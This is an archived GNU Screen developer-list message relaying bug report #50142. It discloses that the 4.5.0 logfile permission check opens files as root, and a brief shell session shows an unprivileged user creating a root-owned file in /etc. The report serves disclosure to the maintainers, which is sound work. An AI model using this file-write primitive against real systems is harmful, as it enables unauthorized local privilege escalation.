[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[screen-devel] [bug #50142] root exploit 4.5.0
From: |
anonymous |
Subject: |
[screen-devel] [bug #50142] root exploit 4.5.0 |
Date: |
Tue, 24 Jan 2017 19:05:10 +0000 (UTC) |
User-agent: |
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0 |
URL:
<http://savannah.gnu.org/bugs/?50142>
Summary: root exploit 4.5.0
Project: GNU Screen
Submitted by: None
Submitted on: Tue 24 Jan 2017 07:05:09 PM UTC
Category: Program Logic
Severity: 3 - Normal
Priority: 5 - Normal
Status: None
Privacy: Private
Assigned to: None
Open/Closed: Open
Discussion Lock: Any
Release: None
Fixed Release: None
Planned Release: None
Work Required: None
_______________________________________________________
Details:
Commit f86a374 ("screen.c: adding permissions check for the logfile name",
2015-11-04)
The check opens the logfile with full root privileges. This allows us to
truncate any file or create a root-owned file with any contents in any
directory and can be easily exploited to full root access in several ways.
> address@hidden:~$ screen --version
> Screen version 4.05.00 (GNU) 10-Dec-16
> address@hidden:~$ id
> uid=125(buczek) gid=125(buczek)
groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw)
> address@hidden:~$ cd /etc
> address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
> address@hidden:/etc (master)$ ls -l bla.bla
> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> address@hidden:/etc (master)$ cat bla.bla
> fail
> address@hidden:/etc (master)$
Donald Buczek <address@hidden>
_______________________________________________________
Reply to this item at:
<http://savannah.gnu.org/bugs/?50142>
_______________________________________________
Message sent via/by Savannah
http://savannah.gnu.org/
- [screen-devel] [bug #50142] root exploit 4.5.0,
anonymous <=